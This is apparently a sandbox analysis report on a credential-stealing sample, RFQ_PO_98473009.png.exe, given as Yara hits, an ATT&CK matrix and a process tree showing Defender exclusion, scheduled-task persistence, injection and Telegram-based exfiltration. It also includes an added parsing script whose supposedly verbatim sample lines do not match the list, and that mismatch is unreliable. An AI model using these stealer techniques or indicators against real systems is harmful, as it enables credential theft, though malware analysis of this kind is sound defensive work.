                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR
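The identifiers in the Yara match list above are opaque until they are mapped back to processes: the .unpack names carry a sandbox process index, a phase number, the image name and a hex base address; the .sdmp memory-dump names carry the same index and phase zero-padded in hex plus the base address, but no image name; the MEMORYSTR entries name the image and the OS PID. The script below is an added example, not part of the Joe Sandbox report. Its field layout is inferred from the identifiers on this page (index 0000000A in a dump name is process 10 of the .unpack names, and address 00000000025A0000 is the 25a0000 region of that same process); the trailing fields of the .sdmp name are kept raw rather than decoded, and the input lines are copied from the list above.

```python
"""Parse Joe Sandbox Yara-match source identifiers and group the hits by process.

Added example, not part of the report. The layout below is inferred from the
identifiers on this page; the four trailing .sdmp fields are kept as printed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed input: lines copied verbatim from the Yara match list on this page.
SAMPLE_LINES = """\
Source: Yara match File source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR
"""

LINE_RE = re.compile(r"File source:\s*(?P<src>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*$")
# "<index>.<phase>.<image>.<hex address>.<n>[.raw].unpack", index and phase in decimal
UNPACK_RE = re.compile(
    r"^(?P<idx>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<addr>[0-9a-f]+)\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$"
)
# "<index>.<phase>.<dump id>.<base address>.<four raw fields>.sdmp", index/phase/address zero-padded hex
SDMP_RE = re.compile(
    r"^(?P<idx>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>\d+)\.(?P<addr>[0-9A-F]{16})"
    r"\.(?P<rest>[0-9A-F]{8}(?:\.[0-9A-F]{8}){3})\.sdmp$"
)
MEMSTR_RE = re.compile(r"^Process Memory Space:\s*(?P<image>\S+)\s+PID:\s*(?P<pid>\d+)$")


@dataclass(frozen=True)
class Hit:
    kind: str                    # UNPACKEDPE, MEMORY or MEMORYSTR
    source: str                  # identifier exactly as printed in the report
    index: Optional[int] = None  # sandbox process index (not the OS PID), inferred from the names
    phase: Optional[int] = None  # phase number as used in the report's names
    image: Optional[str] = None
    address: Optional[int] = None
    pid: Optional[int] = None
    raw: bool = False            # ".raw.unpack" variant of an unpacked PE


def parse_line(line: str) -> Optional[Hit]:
    """Turn one 'File source: ..., type: ...' line into a Hit, or None if it is not one."""
    m = LINE_RE.search(line)
    if not m:
        return None
    src, kind = m.group("src"), m.group("type")
    if (u := UNPACK_RE.match(src)):
        return Hit(kind, src, int(u["idx"]), int(u["phase"]), u["image"], int(u["addr"], 16),
                   raw=bool(u["raw"]))
    if (s := SDMP_RE.match(src)):
        return Hit(kind, src, int(s["idx"], 16), int(s["phase"], 16), None, int(s["addr"], 16))
    if (p := MEMSTR_RE.match(src)):
        return Hit(kind, src, image=p["image"], pid=int(p["pid"]))
    return Hit(kind, src)  # unknown shape: keep it, but with no decoded fields


def parse_report(text: str) -> list:
    return [h for h in (parse_line(line) for line in text.splitlines()) if h]


def image_by_index(hits: list) -> dict:
    """Unpacked-PE names carry the image; .sdmp names only the index. Learn the join from the former."""
    return {h.index: h.image for h in hits if h.index is not None and h.image}


def summarize(hits: list) -> dict:
    """Hit count per process, labelling memory dumps with the image learned from unpack entries."""
    names = image_by_index(hits)
    counts = defaultdict(int)
    for h in hits:
        if h.index is not None:
            key = f"process {h.index} ({names.get(h.index, 'unknown image')})"
        elif h.pid is not None:
            key = f"{h.image} PID {h.pid}"
        else:
            key = h.source
        counts[key] += 1
    return dict(counts)


def regions_for_index(hits: list, index: int) -> list:
    """Distinct base addresses with a hit in one process: the regions to pull for manual review."""
    return sorted({h.address for h in hits if h.index == index and h.address is not None})


if __name__ == "__main__":
    hits = parse_report(SAMPLE_LINES)
    for key, n in sorted(summarize(hits).items()):
        print(f"{n:3d}  {key}")
    print("process 18 regions:", [hex(a) for a in regions_for_index(hits, 18)])
```

Feeding the whole match list through parse_report turns the repeated blocks into a short per-process table and, per process index, the list of base addresses worth carving out of the memory dumps; the index-to-image join is what makes the otherwise anonymous .sdmp entries attributable.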
MITRE ATT&CK Matrix (one line per tactic, techniques in the report's row order; bracketed digits are the markers the report prints in front of a technique name, reproduced as printed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: [11] Native API; [3] Command and Scripting Interpreter; [1] Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: [1] DLL Side-Loading; [1] Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: [1] DLL Side-Loading; [112] Process Injection; [1] Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: [11] Disable or Modify Tools; [11] Deobfuscate/Decode Files or Information; [14] Obfuscated Files or Information; [22] Software Packing; [1] DLL Side-Loading; [111] Masquerading; [41] Virtualization/Sandbox Evasion; [112] Process Injection
Credential Access: [1] OS Credential Dumping; [1] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: [1] System Time Discovery; [1] File and Directory Discovery; [34] System Information Discovery; [141] Security Software Discovery; [41] Virtualization/Sandbox Evasion; [3] Process Discovery; [1] Application Window Discovery; [1] System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: [11] Archive Collected Data; [1] Data from Local System; [1] Email Collection; [1] Input Capture; [1] Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: [1] Web Service; [3] Ingress Tool Transfer; [11] Encrypted Channel; [3] Non-Application Layer Protocol; [14] Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1632428 | Sample: RFQ_PO_98473009.png.exe | Startdate: 07/03/2025 | Architecture: WINDOWS | Score: 100

Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures.
Graph-level DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains.

Process tree (rendered from the graph nodes and edges):
• RFQ_PO_98473009.png.exe
  - dropped: C:\Users\user\AppData\...\lVbhkOPdhyxT.exe (PE32); C:\Users\...\lVbhkOPdhyxT.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp2D18.tmp (XML); C:\Users\user\...\RFQ_PO_98473009.png.exe.log (ASCII)
  - signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  - RFQ_PO_98473009.png.exe (child)
    - dropped: C:\Users\user\AppData\...\Native_snake01.exe (PE32); C:\Users\user\AppData\...\Native_New-Nova.exe (PE32)
    - Native_New-Nova.exe
      - network: reallyfreegeoip.org 104.21.64.1 port 443 (CLOUDFLARENETUS, United States)
      - signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file / registry access)
    - Native_snake01.exe
      - network: api.telegram.org 149.154.167.220 port 443 (TELEGRAMRU, United Kingdom); checkip.dyndns.com 193.122.130.0 (ORACLE-BMC-31898US, United States)
  - powershell.exe (Loading BitLocker PowerShell Module)
    - conhost.exe
    - WmiPrvSE.exe
  - powershell.exe
    - conhost.exe
  - 3 other processes
    - conhost.exe
• lVbhkOPdhyxT.exe
  - signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
  - lVbhkOPdhyxT.exe (child)
    - Native_snake01.exe
      - network: 132.226.247.73 port 80 (UTMEMUS, United States)
      - signature: Tries to harvest and steal browser information (history, passwords, etc)
    - Native_New-Nova.exe
  - schtasks.exe
    - conhost.exe
• svchost.exe
  - network: 127.0.0.1 (unknown)

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.